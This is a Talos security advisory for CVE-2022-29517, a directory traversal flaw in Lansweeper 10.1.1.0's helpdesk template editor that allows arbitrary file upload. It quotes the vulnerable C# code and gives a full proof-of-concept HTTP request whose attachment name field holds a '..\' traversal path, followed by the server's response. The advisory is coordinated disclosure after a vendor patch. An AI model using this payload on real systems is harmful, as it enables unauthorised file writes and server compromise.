Talos Vulnerability Report

TALOS-2022-1529

Lansweeper lansweeper HelpdeskActions.aspx edittemplate directory traversal vulnerability

December 1, 2022
CVE Number

CVE-2022-29517

SUMMARY

A directory traversal vulnerability exists in the HelpdeskActions.aspx edittemplate functionality of Lansweeper lansweeper 10.1.1.0. A specially-crafted HTTP request can lead to arbitrary file upload. An attacker can send an HTTP request to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Lansweeper lansweeper 10.1.1.0

PRODUCT URLS

lansweeper - https://www.lansweeper.com/

CVSSv3 SCORE

9.9 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)

DETAILS

Lansweeper is an IT Asset Management solution that gathers hardware and software information of computers and other devices on a computer network for management, compliance and audit purposes.

An exploitable directory traversal vulnerability is related with an action: Helpdesk -> choose any ticket -> Template [editor window] -> Edit any template -> add inline file and is located inside the LS\WS\HelpdeskActions.cs file. Let us take a close look at the vulnerable source code :

Line 1 	private static void EditTemplate()
Line 2 	{
Line 3 		HttpContext current = HttpContext.Current;
Line 4 		Page page = (Page)HttpContext.Current.Handler;
Line 5 		JsReturnObject jsReturnObject = new JsReturnObject();
Line 6 		int num = int.Parse(current.Request["id"]);
Line 7 		string text = current.Request["templatetext"];
Line 8 		string text2 = current.Request["name"];
Line 9 		int value = int.Parse(current.Request["templatecategory"]);
Line 10		bool flag = false;
Line 11		HttpFileCollection files = current.Request.Files;
Line 12		
Line 13				for (int m = 1; m <= int.Parse(current.Request["inlineattachmentste"]); m++)
Line 14				{
Line 15					int num2 = (current.Request["inlineattachment" + m] ?? "").IndexOf("base64");
Line 16					if (current.Request["inlineattachment" + m] == null || num2 <= 0)
Line 17					{
Line 18						continue;
Line 19					}
Line 20					string path = LSFolder.HelpdeskTemplateFiles.GetPath();
Line 21					
Line 22					byte[] array2 = Convert.FromBase64String(current.Request["inlineattachment" + m].Substring(num2 + 7));
Line 23					string text7 = num + "_" + current.Request["inlineattachmentname" + m];
Line 24					try
Line 25					{
Line 26						FileStream fileStream = new FileStream(path + text7, FileMode.CreateNew, FileAccess.Write, FileShare.None);
Line 27						try
Line 28						{
Line 29							fileStream.Write(array2, 0, array2.Length);
Line 30							flag = true;
Line 31						}
Line 32						finally
Line 33						{
Line 34							((IDisposable)fileStream).Dispose();
Line 35						}
Line 36					}
Line 37					catch
Line 38					{
Line 39					}
Line 40				}

Creating a ticket template, a user is able to add to it inline files inlineattachment. Each inline file entry has its own name, inlineattachmentname. inlineattachmentname is not sanitized at all in a context of directory traversal, and it is further concatenated in a simple way with a path to helpdesk template files directory line 26. Lack of a proper inlineattachmentname sanitization allows an attacker to upload a file to an arbitrary destination within the file system.

Exploit Proof of Concept

REQUEST

POST /helpdesk/HelpdeskActions.aspx?action=edittemplate&id=2 HTTP/1.1
Host: 192.168.0.102:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------12029611817265063291319576436
Content-Length: 2156
Origin: http://192.168.0.102:81
Connection: close
Referer: http://192.168.0.102:81/helpdesk/ticket.aspx?nonew=-7&tid=24
Cookie: UserSettings=language=1; ASP.NET_SessionId=ke33dhy3jtng0hcwed2fe5av; custauth=username=hacker&userdomain=; __RequestVerificationToken_Lw__=zP2evPOU4gLNF/pF3R1XPsIP7ceImHsHKoqy7GfYwDnIwHnDJKt3r5+0bFTXNS/XpEAiyEFBVT2ekfSLIPgVMULtvi8Ae4qLSYcUO0UH90vcERUKMi72E3I2yEJexWSyNKlA8gcXlfMPYbc0a94Dji44b2cNn4aS0KGOSUQBn/0=
Upgrade-Insecure-Requests: 1

-----------------------------12029611817265063291319576436
Content-Disposition: form-data; name="__VIEWSTATE"


-----------------------------12029611817265063291319576436
Content-Disposition: form-data; name="name"

Approval
-----------------------------12029611817265063291319576436
Content-Disposition: form-data; name="templatetext"

<span><img style="max-width: 950px;" src="/helpdesk/TicketTemplateActions.aspx?action=gettemplateattachment&amp;fileuid=cat123.jpg&amp;templateid=2" alt="cat123.jpg"></span>Thank you, we have received your request.<div><br></div><div>After we got an approval we will execute all required steps in order to provide what you need. We kindly ask for your patience until someone from the helpdesk will contact you.</div><div><br></div><div>In case we would need further information, this ticket will be assigned back to you in state "Awaiting Reply". Please provide necessary details as soon as possible in order to ensure swift processing.</div>
-----------------------------12029611817265063291319576436
Content-Disposition: form-data; name="templatecategory"

1
-----------------------------12029611817265063291319576436
Content-Disposition: form-data; name="inlineattachment1"

data:application/octet-stream;base64,WW91IGhhdmUgYmVlbiAwd24zZCE=
-----------------------------12029611817265063291319576436
Content-Disposition: form-data; name="inlineattachmentname1"

..\..\..\..\..\..\..\HACKED.jpg
-----------------------------12029611817265063291319576436
Content-Disposition: form-data; name="inlineattachment3"

data:text/plain;base64,dmVyc2lvbj0xOS4wLjAKY2xpZW50PWZpcmViYXNlLWFuYWx5dGljcwpmaXJlYmFzZS1hbmFseXRpY3NfY2xpZW50PTE5LjAuMAo=
-----------------------------12029611817265063291319576436
Content-Disposition: form-data; name="inlineattachmentname3"

firebase-analytics.jpg
-----------------------------12029611817265063291319576436
Content-Disposition: form-data; name="inlineattachmentste"

3
-----------------------------12029611817265063291319576436
Content-Disposition: form-data; name="filestodelete"


-----------------------------12029611817265063291319576436--

RESPONSE

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/8.0
x-frame-options: SAMEORIGIN
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 07 Jun 2022 13:32:56 GMT
Connection: close
Content-Length: 173

{"ErrorType":"","Error":false,"Emsg":"","AddedRows":[["Approval","1","True"]],"Columns":[],"Columnwid":[],"Action":"","ReturnValues":{},"ReturnValue":"","ReturnObject":null}
TIMELINE

2022-06-27 - Vendor Disclosure
2022-11-29 - Vendor Patch Release
2022-12-01 - Public Release

Credit

Discovered by Marcin 'Icewall' Noga of Cisco Talos.

TALOS-2022-1530

TALOS-2022-1528